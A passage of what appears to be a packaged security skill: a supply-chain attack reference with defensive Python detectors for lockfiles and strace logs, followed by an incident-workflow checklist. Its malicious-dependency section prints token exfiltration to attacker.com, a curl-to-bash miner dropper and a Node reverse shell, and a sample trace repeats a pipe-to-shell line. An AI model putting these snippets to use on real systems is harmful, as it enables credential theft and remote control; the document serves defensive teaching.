pom.xml only adds a source; Maven still consults Central\n\u003cmirrors>\n \u003cmirror>\n \u003cid>company-internal\u003c/id>\n \u003cmirrorOf>*\u003c/mirrorOf>\n \u003curl>https://maven.internal.company.com\u003c/url>\n \u003c/mirror>\n\u003c/mirrors>\n```\n\n**Mitigation**:\n- Use scoped/namespaced packages (@company/package-name)\n- Configure package manager to resolve internal names only from the internal registry\n- Reserve public names for internal 
packages\n- Implement allowlists for external packages\n- Pin dependency versions\n\n### 2. Typosquatting\n\n**MITRE ATT&CK**: T1195.001\n**CWE**: CWE-829 (Inclusion of Functionality from Untrusted Control Sphere)\n\n**Attack Description**:\nMalicious packages with names similar to popular packages, relying on typos during installation.\n\n**Real-World Examples**:\n- **crossenv** (mimicking cross-env, 2017) - harvested environment variables, and with them npm tokens and cloud keys; 700+ downloads before removal\n- **electorn** (mimicking electron) - credential stealer\n- **python3-dateutil** (mimicking python-dateutil, 2019) - stole SSH and GPG keys\n\n**Common Typosquatting Patterns**:\n- Missing/extra character: `requsts` or `requestss` vs `requests`\n- Substituted character: `reqvests` vs `requests`\n- Transposed characters: `reqeusts` vs `requests`\n- Homoglyphs: `requ𝗲sts` vs `requests` (Unicode lookalikes)\n- Namespace confusion: `@npm/lodash` vs `lodash`\n\n**Detection**:\n- Levenshtein distance analysis on new dependencies (normalize Unicode and digit lookalikes first, so `requ𝗲sts` compares as identical to `requests` rather than as one substitution)\n- Check package popularity and age\n- Review package maintainer history\n- Verify package repository URL\n\n**Black Duck Detection** (component quality indicators):\n- Download count (typosquats typically low)\n- Creation date (recent for established functionality)\n- Maintainer reputation\n- GitHub stars/forks (legitimate packages have more)\n\n**Prevention**:\n- Use dependency lock files (package-lock.json, yarn.lock)\n- Code review for new dependencies\n- Automated typosquatting detection tools\n- IDE autocomplete from verified sources\n\n### 3. 
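Worked example: auditing a lockfile for dependency confusion and typosquats

The registry-origin and version-spike checks listed under Dependency Confusion and the edit-distance, homoglyph and namespace checks listed under Typosquatting, combined into one added Python example. This is not code from this page or from Black Duck. The registry hosts, the `@company/` scope, the internal-version table, the popular-package list and the package-lock.json are all constructed for the example; a real run would load the lockfile from disk and the popular list from the registry's top-N download data.

```python
"""Audit a package-lock.json for dependency-confusion and typosquat signals.

Added example for this page; it is not code from the page or from Black Duck.
For every locked package it checks (1) that internal names resolve only from the
internal registry and everything else only from the public one, (2) that internal
packages do not jump implausibly in major version, and (3) that the name is not a
near-miss, homoglyph or re-scoped copy of a popular package. The registry hosts,
internal-name list, popular-name list and lockfile below are constructed.
"""
import json
import unicodedata
from urllib.parse import urlparse

INTERNAL_REGISTRY = "npm.internal.company.com"       # assumed internal registry host
PUBLIC_REGISTRY = "registry.npmjs.org"
INTERNAL_SCOPE = "@company/"                         # assumed scope reserved for internal code
INTERNAL_VERSIONS = {"company-auth-lib": "1.4.2"}    # highest version published internally
POPULAR = {"lodash", "express", "cross-env", "electron", "requests"}  # sample top-N names

# Constructed lockfileVersion 3 file: one clean public dep, one clean scoped internal dep,
# one internal name pulled from the public registry at a huge version, one typosquat.
SAMPLE_LOCK = json.dumps({"name": "example-app", "lockfileVersion": 3, "packages": {
    "": {"name": "example-app", "version": "1.0.0"},
    "node_modules/lodash": {"version": "4.17.21",
        "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz"},
    "node_modules/@company/ui-kit": {"version": "3.0.1",
        "resolved": "https://npm.internal.company.com/@company/ui-kit/-/ui-kit-3.0.1.tgz"},
    "node_modules/company-auth-lib": {"version": "99.0.0",
        "resolved": "https://registry.npmjs.org/company-auth-lib/-/company-auth-lib-99.0.0.tgz"},
    "node_modules/crossenv": {"version": "6.1.1",
        "resolved": "https://registry.npmjs.org/crossenv/-/crossenv-6.1.1.tgz"},
}})


def normalize(name):
    """Fold lookalikes before comparing: NFKC maps Unicode math letters such as '𝗲' to 'e';
    the translate table maps digit lookalikes (0->o, 1->l, 3->e, 5->s)."""
    return unicodedata.normalize("NFKC", name).lower().translate(str.maketrans("0135", "oles"))


def levenshtein(a, b):
    """Plain edit distance (insert/delete/substitute), stdlib only."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_matches(name, popular=POPULAR, max_distance=2):
    """Popular names the given name could be impersonating, as (popular, distance) pairs."""
    if name in popular:
        return []                                   # it *is* the popular package
    base = name.rsplit("/", 1)[-1]                  # '@npm/lodash' -> 'lodash' (scope confusion)
    hits = []
    for pop in popular:
        if base == pop or normalize(base) == normalize(pop):
            d = 0                                   # same name under a scope, or homoglyph copy
        else:
            d = levenshtein(normalize(base), normalize(pop))
        if d <= max_distance:
            hits.append((pop, d))
    return sorted(hits, key=lambda h: h[1])


def audit_lockfile(lock_json):
    """Return (package, version, reason) findings for a lockfileVersion 2/3 package-lock.json."""
    findings = []
    for path, entry in json.loads(lock_json).get("packages", {}).items():
        if path == "":
            continue                                # root project entry
        name = path.split("node_modules/")[-1]      # nested paths collapse to the package name
        version = entry.get("version", "")
        internal = name.startswith(INTERNAL_SCOPE) or name in INTERNAL_VERSIONS
        host = urlparse(entry.get("resolved", "")).hostname
        expected = INTERNAL_REGISTRY if internal else PUBLIC_REGISTRY
        if host != expected:
            findings.append((name, version, f"resolved from {host}, expected {expected}"))
        known = INTERNAL_VERSIONS.get(name)
        if known and int(version.split(".")[0]) > int(known.split(".")[0]) + 1:
            findings.append((name, version, f"major version jump, internal max is {known}"))
        for pop, d in typosquat_matches(name):
            findings.append((name, version, f"name within edit distance {d} of popular package {pop}"))
    return findings


if __name__ == "__main__":
    for name, version, reason in audit_lockfile(SAMPLE_LOCK):
        print(f"{name}@{version}: {reason}")
```

Run against the sample it reports three findings: `company-auth-lib` twice (resolved from the public registry, and a 1.x to 99.x jump) and `crossenv` as a distance-1 neighbour of `cross-env`. Wire `audit_lockfile` into the pull-request check so a lockfile whose `resolved` host changes for an internal name fails the build, and keep the edit-distance threshold at 2 or lower; at 3 it starts flagging unrelated short names.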
Compromised Maintainer Accounts\n\n**MITRE ATT&CK**: T1195.002\n**CWE**: CWE-308 (Use of Single-factor Authentication)\n\n**Attack Description**:\nAttackers gain control of legitimate maintainer accounts through credential compromise or social engineering, then publish malicious versions under the trusted name.\n\n**Real-World Examples**:\n- **event-stream (2018)**: Maintainer handed the package to a new contributor, who added a malicious dependency\n- **ua-parser-js (2021)**: Hijacked account used to publish versions carrying a cryptocurrency miner and a password stealer\n- **coa, rc (2021)**: Hijacked maintainer account used to publish versions carrying the same password-stealing payload\n\n**Attack Indicators**:\n- Unexpected version releases\n- New maintainers added\n- Changed package repository URLs\n- Sudden dependency additions\n- Obfuscated code in updates\n- Behavioral changes (network calls, file system access)\n\n**Detection with Black Duck**:\n```\nMonitor for:\n- Maintainer changes\n- Unusual release patterns\n- Security score degradation\n- New external dependencies\n- Build process changes\n```\n\n**Prevention**:\n- Enable 2FA/MFA for registry accounts\n- Use hardware security keys\n- Registry account monitoring/alerts\n- Code signing for packages\n- Review release process changes\n- On the consuming side, where the maintainer's account hygiene is out of your hands: pin exact versions and wait a few days before adopting a fresh release, since hijacked versions are often pulled within hours\n\n### 4. 
Malicious Dependencies (Direct Injection)\n\n**MITRE ATT&CK**: T1195.001\n\n**Attack Description**:\nPackages whose purpose is malicious, or a legitimate package's release replaced with a malicious one (the examples below are of the second kind); adoption is driven by SEO, social engineering, or the trust already attached to the hijacked name.\n\n**Real-World Examples**:\n- **event-stream → flatmap-stream (2018)**: Injected dependency that stole Bitcoin wallet keys from the Copay app\n- **bootstrap-sass 3.2.0.3 (2019)**: Backdoor giving remote code execution via a crafted cookie\n- **eslint-scope (2018)**: npm credential stealer published from a compromised maintainer account\n\n**Common Malicious Behaviors**:\n- Credential harvesting (env vars, config files)\n- Cryptocurrency mining\n- Backdoor installation\n- Data exfiltration\n- Command & control communication\n\n**Example Malicious Code Patterns** (written out plainly; real droppers obfuscate or stage these):\n```javascript\n// Environment variable exfiltration (fetch is global in Node 18+)\nconst secrets = {\n npm_token: process.env.NPM_TOKEN,\n aws_key: process.env.AWS_ACCESS_KEY_ID,\n github_token: process.env.GITHUB_TOKEN\n};\nfetch('https://attacker.com/collect', {\n method: 'POST',\n body: JSON.stringify(secrets)\n});\n\n// Cryptocurrency miner dropper (pipe-to-shell from an install script)\nconst { exec } = require('child_process');\nexec('curl http://attacker.com/miner.sh | bash');\n\n// Reverse-shell backdoor\nconst net = require('net');\nconst { spawn } = require('child_process');\nconst shell = spawn('/bin/bash', []);\nnet.connect(4444, 'attacker.com', function() {\n this.pipe(shell.stdin);\n shell.stdout.pipe(this);\n});\n```\n\n**Detection**:\n- Network activity during install (install scripts shouldn't make external calls)\n- File system modifications outside package directory\n- Process spawning during installation\n- Obfuscated or minified code in source packages\n- Suspicious dependencies for package scope\n\n**Black Duck Indicators**:\n- Low community adoption for claimed functionality\n- Recent creation date\n- Lack of GitHub repository or activity\n- Poor code quality metrics\n- No documentation or minimal README\n\n### 5. 
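Worked example: triaging an install-time strace log

The detection list above (network activity, process spawning and file access during install) as an added Python example that scores an `strace -f` capture of `npm install`; this is not code from this page or from Black Duck. Because `connect()` records IP addresses rather than host names, the check matches destinations against the address ranges the registry mirror and the DNS resolver live in; the CIDRs, the credential-file list and the trace itself are constructed for the example.

```python
"""Triage an strace log of `npm install` for install-script abuse.

Added example for this page; not code from the page or from Black Duck. connect()
records IP addresses, so destinations are matched against the address ranges the
registry mirror and the DNS resolver live in (assumed CIDRs); pipe-to-shell commands
are flagged; and reads of credential files are flagged when done by any process
other than the npm client itself (which legitimately reads .npmrc). The trace is a
constructed sample in `strace -f -o <file>` format (pid first on each line).
"""
import ipaddress
import re

ALLOWED_NETS = [ipaddress.ip_network("104.16.0.0/16"),   # assumed: public registry CDN range
                ipaddress.ip_network("10.0.0.0/8")]      # assumed: internal mirror and resolver
SENSITIVE = (".ssh/", ".npmrc", ".aws/", ".gnupg/", "/.env", ".git-credentials", ".docker/config.json")

PID_RE = re.compile(r"^(?:\[pid\s+(\d+)\]|(\d+))\s+")   # '1234 ...' or '[pid 1234] ...'
CONNECT_RE = re.compile(r'connect\(\d+, \{sa_family=AF_INET, sin_port=htons\((\d+)\), '
                        r'sin_addr=inet_addr\("([\d.]+)"\)')
EXECVE_RE = re.compile(r'execve\("[^"]*", \[([^\]]*)\]')
OPENAT_RE = re.compile(r'openat\([^,]+, "([^"]+)"')
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b")

SAMPLE_TRACE = """\
2201 execve("/usr/bin/node", ["node", "/usr/lib/node_modules/npm/bin/npm-cli.js", "install"], 0x7ffd /* 30 vars */) = 0
2201 connect(20, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("10.0.0.2")}, 16) = 0
2201 connect(21, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("104.16.27.35")}, 16) = 0
2244 execve("/bin/sh", ["sh", "-c", "node preinstall.js"], 0x55d0 /* 30 vars */) = 0
2245 openat(AT_FDCWD, "/home/build/app/node_modules/left-pad/package.json", O_RDONLY|O_CLOEXEC) = 21
2245 openat(AT_FDCWD, "/home/build/.npmrc", O_RDONLY|O_CLOEXEC) = 22
2245 openat(AT_FDCWD, "/home/build/.ssh/id_ed25519", O_RDONLY) = -1 ENOENT (No such file or directory)
2245 connect(23, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("203.0.113.7")}, 16) = 0
2246 execve("/bin/sh", ["sh", "-c", "curl -s http://203.0.113.7/m.sh | bash"], 0x55d0 /* 30 vars */) = 0
"""


def triage(trace):
    """Return (kind, pid, detail) findings; kind is network, pipe-to-shell or secret-read."""
    findings = []
    npm_pid = None
    for line in trace.splitlines():
        m = PID_RE.match(line)
        pid = (m.group(1) or m.group(2)) if m else None
        if npm_pid is None:
            npm_pid = pid                            # first line belongs to the traced npm client
        if c := CONNECT_RE.search(line):
            port, ip = int(c.group(1)), ipaddress.ip_address(c.group(2))
            if not any(ip in net for net in ALLOWED_NETS):
                findings.append(("network", pid, f"{ip}:{port}"))
        elif e := EXECVE_RE.search(line):
            if PIPE_TO_SHELL.search(e.group(1)):
                findings.append(("pipe-to-shell", pid, e.group(1)))
        elif o := OPENAT_RE.search(line):
            path = o.group(1)
            if pid != npm_pid and any(marker in path for marker in SENSITIVE):
                findings.append(("secret-read", pid, path))   # attempts count, even when ENOENT
    return findings


if __name__ == "__main__":
    for kind, pid, detail in triage(SAMPLE_TRACE):
        print(f"[{kind}] pid {pid}: {detail}")
```

On the sample the DNS lookup, the registry fetch and the ordinary `preinstall.js` spawn pass, while the child process reading `.npmrc` and probing `~/.ssh`, the outbound connection to port 4444 and the `curl | bash` spawn are reported. Run the capture in a throwaway container, since tracing the install means executing the package's scripts.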
Build System Compromise\n\n**MITRE ATT&CK**: T1195.002 (Compromise Software Supply Chain; T1195.003 is the hardware variant)\n**CWE**: CWE-494\n\n**Attack Description**:\nCompromising the build or release infrastructure to inject malicious code during the build process.\n\n**Real-World Examples**:\n- **SolarWinds (2020)**: Build system compromise led to trojanized software updates\n- **Codecov (2021)**: Bash uploader script modified to exfiltrate CI credentials\n\n**Attack Vectors**:\n- Compromised CI/CD credentials\n- Malicious CI/CD pipeline configurations\n- Compromised build dependencies\n- Registry credential theft during build\n- Artifact repository compromise\n\n**Detection**:\n- Reproducible builds (verify build output matches)\n- Build artifact signing and verification\n- Supply chain levels for software artifacts (SLSA)\n- Build provenance tracking\n\n**Prevention**:\n- Secure CI/CD infrastructure\n- Minimal build environment (containers)\n- Secret management (avoid env vars in logs)\n- Build isolation and sandboxing\n- SBOM generation at build time\n\n## Detection Strategies\n\n### Static Analysis Indicators\n\n**Package Metadata Analysis**:\n```python\n# Black Duck exposes component metrics of this kind; the variable names are\n# illustrative, not API field names\nsuspicious_indicators = {\n \"recent_creation\": age_days \u003c 30,\n \"low_adoption\": downloads \u003c 100,\n \"no_repository\": github_url is None,\n \"new_maintainer\": maintainer_age_days \u003c 90,\n \"version_spike\": major_version > expected_major + 50,\n \"abandoned\": last_update_days > 730\n}\n```\n\n### Behavioral Analysis\n\n**Runtime Monitoring**:\n- Network connections during install\n- File system access outside package directory\n- Process spawning (especially child processes)\n- Environment variable access\n- Encrypted/obfuscated payloads\n\n**Example Detection Script**:\n```bash\n#!/bin/bash\n# Monitor package installation for suspicious behavior.\n# Run this in a throwaway container: it executes the package's install scripts.\n# connect() shows IP addresses, not host names, so the host-name filter below only\n# drops the DNS lookups; resolve or allow-list your registry's addresses as well.\n\nstrace -f -e trace=network,process,file npm install suspicious-package 2>&1 | \\\n grep -E \"(connect|sendto|execve|openat)\" | \\\n grep -v \"npmjs.org\\|yarnpkg.com\" # Exclude legitimate 
registries\n\n# Any network activity to non-registry addresses during install is suspicious\n```\n\n### Dependency Graph Analysis\n\n**Transitive Dependency Risk**:\n```\nYour App\n├── [email protected]\n│ └── [email protected] (✓ Safe)\n│ └── [email protected] (⚠️ Recently added)\n│ └── [email protected] (❌ SUSPICIOUS)\n```\n\n**Black Duck Features**:\n- Full dependency tree visualization\n- Transitive vulnerability detection\n- Component risk scoring\n- Supply chain risk assessment\n\n## Prevention and Mitigation\n\n### 1. Dependency Vetting Process\n\n**Before Adding Dependency**:\n```markdown\n# Dependency Vetting Checklist\n\n- [ ] Active maintenance (commits within 3 months)\n- [ ] Sufficient adoption (downloads, GitHub stars)\n- [ ] Code repository available and reviewed\n- [ ] Recent security audit or assessment\n- [ ] Compatible license\n- [ ] Minimal transitive dependencies\n- [ ] No known vulnerabilities (Black Duck scan)\n- [ ] Maintainer reputation verified\n- [ ] Reasonable package size\n- [ ] Documentation quality adequate\n```\n\n**Automated Checks**:\n```bash\n#!/bin/bash\n# Automated dependency vetting (run before adding a package)\n\nPACKAGE=$1\n\n# Check age and popularity. `npm view` has no download field; the registry's\n# downloads API provides it\nnpm view \"$PACKAGE\" time.created\ncurl -s \"https://api.npmjs.org/downloads/point/last-month/$PACKAGE\"\n\n# Check for known vulnerabilities in the current project\nnpm audit\n\n# Black Duck scan\nscripts/blackduck_scan.py --project temp-vet --version 1.0.0\n\n# Check for typosquatting. Needs the python-Levenshtein package;\n# package_registry.get_popular_packages is a placeholder for your own top-N name list\npython3 -c \"\nimport Levenshtein\nfrom package_registry import get_popular_packages  # placeholder module\n\npopular = get_popular_packages()\nfor pkg in popular:\n distance = Levenshtein.distance('$PACKAGE', pkg)\n if 0 \u003c distance \u003c= 2:\n print(f'⚠️ Similar to {pkg} (distance: {distance})')\n\"\n```\n\n### 2. 
Dependency Pinning and Lock Files\n\n**Always use lock files**:\n```json\n// package.json - use exact versions for security-critical deps\n// (comments are shown for illustration; JSON itself does not allow them)\n{\n \"dependencies\": {\n \"critical-auth-lib\": \"1.2.3\", // Exact version\n \"utility-lib\": \"^2.0.0\" // Allow minor updates\n }\n}\n```\n\n**Commit lock files**:\n- package-lock.json (npm)\n- yarn.lock (Yarn)\n- Pipfile.lock / poetry.lock (Python)\n- Gemfile.lock (Ruby)\n- go.sum (Go)\n\n### 3. Subresource Integrity (SRI)\n\n**For CDN-loaded dependencies**:\n```html\n\u003c!-- Use SRI hashes for external scripts -->\n\u003cscript\n src=\"https://cdn.example.com/library.js\"\n integrity=\"sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/ux...\"\n crossorigin=\"anonymous\">\n\u003c/script>\n```\n\n### 4. Private Package Registry\n\n**Benefits**:\n- Control over approved packages\n- Caching for availability\n- Internal package distribution\n- Security scanning integration\n\n**Solutions**:\n- Artifactory (JFrog)\n- Nexus Repository\n- Azure Artifacts\n- AWS CodeArtifact\n- GitHub Packages\n\n**Configuration Example (npm)**:\n```bash\n# .npmrc\nregistry=https://artifactory.company.com/api/npm/npm-virtual/\n@company:registry=https://artifactory.company.com/api/npm/npm-internal/\n\n# Always authenticate (npm 6 and earlier; npm 7+ removed this key and always\n# sends the configured credentials to that registry)\nalways-auth=true\n```\n\n### 5. Continuous Monitoring\n\n**Automated Scanning**:\n```yaml\n# .github/workflows/dependency-scan.yml\nname: Dependency Security Scan\n\non:\n schedule:\n - cron: '0 0 * * *' # Daily\n pull_request:\n push:\n branches: [main]\n\njobs:\n scan:\n runs-on: ubuntu-latest\n steps:\n - uses: actions/checkout@v3\n with:\n fetch-depth: 0 # full history, so origin/main exists for the diff below\n\n - name: Black Duck Scan\n run: |\n scripts/blackduck_scan.py \\\n --project ${{ github.repository }} \\\n --version ${{ github.sha }} \\\n --fail-on-policy\n\n - name: Check for new dependencies\n if: github.event_name == 'pull_request'\n run: |\n git diff origin/main -- package.json package-lock.json | \\\n grep \"^+\" | grep -v \"^+++\" | \\\n while read line; do\n echo \"⚠️ New or changed dependency requires review: $line\"\n done\n```\n\n### 6. 
Runtime Protection\n\n**Application-level**:\n```javascript\n// Freeze object prototypes to prevent pollution. Do this first thing at startup\n// and run the test suite afterwards: libraries that patch prototypes will throw.\nObject.freeze(Object.prototype);\nObject.freeze(Array.prototype);\n\n// Restrict network access for dependencies (if possible)\n// Use Content Security Policy (CSP) for web apps\n\n// Monitor unexpected behavior (securityLog is a placeholder for your logger)\nprocess.on('warning', (warning) => {\n if (warning.name === 'DeprecationWarning') {\n // Log and alert on deprecated API usage\n securityLog.warn('Deprecated API used', { warning });\n }\n});\n```\n\n**Container-level**:\n```dockerfile\n# Use minimal base images\nFROM node:18-alpine\nWORKDIR /app\n\n# Copy manifest and lockfile first so the dependency layer is cached\nCOPY --chown=node:node package.json package-lock.json ./\n\n# Run as non-root for the install and at runtime\nUSER node\n\n# No network access during build (BuildKit flag): an install script that phones\n# home fails the build. Requires a pre-populated npm cache or an offline mirror.\nRUN --network=none npm ci\n\nCOPY --chown=node:node . .\n\n# Read-only file system where possible: enforce it at run time with\n# `docker run --read-only`; a VOLUME instruction does not make anything read-only\n```\n\n## Incident Response\n\n### Detection Phase\n\n**Indicators of Compromise**:\n1. Black Duck alerts on component changes\n2. Unexpected network traffic from application\n3. CPU/memory spikes (cryptocurrency mining)\n4. Security tool alerts\n5. Credential compromise reports\n6. Customer reports of suspicious behavior\n\n### Containment\n\n**Immediate Actions**:\n1. **Isolate**: Remove affected application from network\n2. **Inventory**: Identify all systems using compromised dependency\n3. **Block**: Add malicious package to blocklist\n4. **Rotate**: Rotate all credentials that may have been exposed\n\n```bash\n#!/bin/bash\n# Emergency response script. send_alert, rotate_all_credentials.sh, get_all_projects\n# and the blocklist endpoint are placeholders for your own tooling.\n\nMALICIOUS_PACKAGE=$1\n\n# 1. Block package in registry (endpoint depends on your registry product)\ncurl -X POST https://artifactory/api/blocklist \\\n -d \"{\\\"package\\\": \\\"$MALICIOUS_PACKAGE\\\"}\"\n\n# 2. Find all projects using it. Search lockfiles too: package.json lists only\n# direct dependencies, and the compromised package is usually transitive\ngrep -rl --include=package.json --include=package-lock.json --include=yarn.lock \\\n \"$MALICIOUS_PACKAGE\" /repos || echo \"no local checkout references $MALICIOUS_PACKAGE\"\n\n# 3. Emergency notification\nsend_alert \"CRITICAL: Supply chain compromise detected - $MALICIOUS_PACKAGE\"\n\n# 4. Rotate secrets\n./rotate_all_credentials.sh\n\n# 5. 
Re-scan all projects\nfor project in $(get_all_projects); do\n scripts/blackduck_scan.py --project $project --emergency-scan\ndone\n```\n\n### Eradication\n\n1. **Remove** malicious dependency\n2. **Replace** with safe alternative or version\n3. **Re-scan** with Black Duck to confirm\n4. **Review** logs for malicious activity\n5. **Rebuild** from clean state\n\n### Recovery\n\n1. **Deploy** patched version\n2. **Monitor** for continued malicious activity\n3. **Verify** integrity of application\n4. **Restore** from backup if necessary\n\n### Post-Incident\n\n**Root Cause Analysis**:\n- How did malicious package enter supply chain?\n- What controls failed?\n- What was the impact?\n\n**Improvements**:\n- Update vetting procedures\n- Enhance monitoring\n- Additional training\n- Technical controls\n\n## Tools and Resources\n\n**Detection Tools**:\n- **Synopsys Black Duck**: Comprehensive SCA with supply chain risk\n- **Socket.dev**: Real-time supply chain attack detection\n- **Snyk**: Vulnerability and license scanning\n- **Checkmarx SCA**: Software composition analysis\n\n**Best Practices**:\n- [CISA Supply Chain Guidance](https://www.cisa.gov/supply-chain)\n- [NIST SSDF](https://csrc.nist.gov/publications/detail/sp/800-218/final)\n- [SLSA Framework](https://slsa.dev/)\n- [OWASP Dependency Check](https://owasp.org/www-project-dependency-check/)\n\n**Incident Databases**:\n- [Supply Chain Compromises](https://github.com/IQTLabs/software-supply-chain-compromises)\n- [Backstabber's Knife Collection](https://dasfreak.github.io/Backstabbers-Knife-Collection/)\n\n## References\n\n- [Sonatype 2022 State of Software Supply Chain](https://www.sonatype.com/state-of-the-software-supply-chain)\n- [MITRE ATT&CK - Supply Chain Compromise](https://attack.mitre.org/techniques/T1195/)\n- [NIST SSDF](https://csrc.nist.gov/publications/detail/sp/800-218/final)\n- [Linux Foundation - Securing the Software Supply 
Chain](https://www.linuxfoundation.org/resources/publications/securing-the-software-supply-chain)\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":16454,"content_sha256":"f94b46eaa88b5b7464264e0d0f313e7cb52880ff501055f6be171a40c04ad6ea"},{"filename":"references/WORKFLOW_CHECKLIST.md","content":"# Workflow Checklist Template\n\nThis template demonstrates workflow patterns for security operations. Copy and adapt these checklists to your specific skill needs.\n\n## Pattern 1: Sequential Workflow Checklist\n\nUse this pattern for operations that must be completed in order, step-by-step.\n\n### Security Assessment Workflow\n\nProgress:\n[ ] 1. Identify application entry points and attack surface\n[ ] 2. Map authentication and authorization flows\n[ ] 3. Identify data flows and sensitive data handling\n[ ] 4. Review existing security controls\n[ ] 5. Document findings with framework references (OWASP, CWE)\n[ ] 6. Prioritize findings by severity (CVSS scores)\n[ ] 7. Generate report with remediation recommendations\n\nWork through each step systematically. Check off completed items.\n\n---\n\n## Pattern 2: Conditional Workflow\n\nUse this pattern when the workflow branches based on findings or conditions.\n\n### Vulnerability Remediation Workflow\n\n1. Identify vulnerability type\n - If SQL Injection → See [sql-injection-remediation.md](sql-injection-remediation.md)\n - If XSS (Cross-Site Scripting) → See [xss-remediation.md](xss-remediation.md)\n - If Authentication flaw → See [auth-remediation.md](auth-remediation.md)\n - If Authorization flaw → See [authz-remediation.md](authz-remediation.md)\n - If Cryptographic issue → See [crypto-remediation.md](crypto-remediation.md)\n\n2. 
Assess severity using CVSS calculator\n - If CVSS >= 9.0 → Priority: Critical (immediate action)\n - If CVSS 7.0-8.9 → Priority: High (action within 24h)\n - If CVSS 4.0-6.9 → Priority: Medium (action within 1 week)\n - If CVSS \u003c 4.0 → Priority: Low (action within 30 days)\n\n3. Apply appropriate remediation pattern\n4. Validate fix with security testing\n5. Document changes and update security documentation\n\n---\n\n## Pattern 3: Iterative Workflow\n\nUse this pattern for operations that repeat across multiple targets or items.\n\n### Code Security Review Workflow\n\nFor each file in the review scope:\n1. Identify security-sensitive operations (auth, data access, crypto, input handling)\n2. Check against secure coding patterns for the language\n3. Flag potential vulnerabilities with severity rating\n4. Map findings to CWE and OWASP categories\n5. Suggest specific remediation approaches\n6. Document finding with code location and fix priority\n\nContinue until all files in scope have been reviewed.\n\n---\n\n## Pattern 4: Feedback Loop Workflow\n\nUse this pattern when validation and iteration are required.\n\n### Secure Configuration Generation Workflow\n\n1. Generate initial security configuration based on requirements\n2. Run validation script: `./scripts/validate_config.py config.yaml`\n3. Review validation output:\n - Note all errors (must fix)\n - Note all warnings (should fix)\n - Note all info items (consider)\n4. Fix identified issues in configuration\n5. Repeat steps 2-4 until validation passes with zero errors\n6. Review warnings and determine if they should be addressed\n7. Apply configuration once validation is clean\n\n**Validation Loop**: Run validator → Fix errors → Repeat until clean\n\n---\n\n## Pattern 5: Parallel Analysis Workflow\n\nUse this pattern when multiple independent analyses can run concurrently.\n\n### Comprehensive Security Scan Workflow\n\nRun these scans in parallel:\n\n**Static Analysis**:\n[ ] 1a. 
Run SAST scan (Semgrep/Bandit)\n[ ] 1b. Run dependency vulnerability scan (Safety/npm audit)\n[ ] 1c. Run secrets detection (Gitleaks/TruffleHog)\n[ ] 1d. Run license compliance check\n\n**Dynamic Analysis**:\n[ ] 2a. Run DAST scan (ZAP/Burp)\n[ ] 2b. Run API security testing\n[ ] 2c. Run authentication/authorization testing\n\n**Infrastructure Analysis**:\n[ ] 3a. Run infrastructure-as-code scan (Checkov/tfsec)\n[ ] 3b. Run container image scan (Trivy/Grype)\n[ ] 3c. Run configuration review\n\n**Consolidation**:\n[ ] 4. Aggregate all findings\n[ ] 5. Deduplicate and correlate findings\n[ ] 6. Prioritize by risk (CVSS + exploitability + business impact)\n[ ] 7. Generate unified security report\n\n---\n\n## Pattern 6: Research and Documentation Workflow\n\nUse this pattern for security research and documentation tasks.\n\n### Threat Modeling Workflow\n\nResearch Progress:\n[ ] 1. Identify system components and boundaries\n[ ] 2. Map data flows between components\n[ ] 3. Identify trust boundaries\n[ ] 4. Enumerate assets (data, services, credentials)\n[ ] 5. Apply STRIDE framework to each component:\n - Spoofing threats\n - Tampering threats\n - Repudiation threats\n - Information disclosure threats\n - Denial of service threats\n - Elevation of privilege threats\n[ ] 6. Map threats to MITRE ATT&CK techniques\n[ ] 7. Identify existing mitigations\n[ ] 8. Document residual risks\n[ ] 9. Recommend additional security controls\n[ ] 10. Generate threat model document\n\nWork through each step systematically. Check off completed items.\n\n---\n\n## Pattern 7: Compliance Validation Workflow\n\nUse this pattern for compliance checks against security standards.\n\n### Security Compliance Audit Workflow\n\n**SOC 2 Controls Review**:\n[ ] 1. Review access control policies (CC6.1, CC6.2, CC6.3)\n[ ] 2. Verify logical access controls implementation (CC6.1)\n[ ] 3. Review authentication mechanisms (CC6.1)\n[ ] 4. Verify encryption implementation (CC6.1, CC6.7)\n[ ] 5. 
Review audit logging configuration (CC7.2)\n[ ] 6. Verify security monitoring (CC7.2, CC7.3)\n[ ] 7. Review incident response procedures (CC7.3, CC7.4)\n[ ] 8. Verify backup and recovery processes (A1.2, A1.3)\n\n**Evidence Collection**:\n[ ] 9. Collect policy documents\n[ ] 10. Collect configuration screenshots\n[ ] 11. Collect audit logs\n[ ] 12. Document control gaps\n[ ] 13. Generate compliance report\n\n---\n\n## Pattern 8: Incident Response Workflow\n\nUse this pattern for security incident handling.\n\n### Security Incident Response Workflow\n\n**Detection and Analysis**:\n[ ] 1. Confirm security incident (rule out false positive)\n[ ] 2. Determine incident severity (SEV1/2/3/4)\n[ ] 3. Identify affected systems and data\n[ ] 4. Preserve evidence (logs, memory dumps, network captures)\n\n**Containment**:\n[ ] 5. Isolate affected systems (network segmentation)\n[ ] 6. Disable compromised accounts\n[ ] 7. Block malicious indicators (IPs, domains, hashes)\n[ ] 8. Implement temporary compensating controls\n\n**Eradication**:\n[ ] 9. Identify root cause\n[ ] 10. Remove malicious artifacts (malware, backdoors, webshells)\n[ ] 11. Patch vulnerabilities exploited\n[ ] 12. Reset compromised credentials\n\n**Recovery**:\n[ ] 13. Restore systems from clean backups (if needed)\n[ ] 14. Re-enable systems with monitoring\n[ ] 15. Verify system integrity\n[ ] 16. Resume normal operations\n\n**Post-Incident**:\n[ ] 17. Document incident timeline\n[ ] 18. Identify lessons learned\n[ ] 19. Update security controls to prevent recurrence\n[ ] 20. Update incident response procedures\n[ ] 21. 
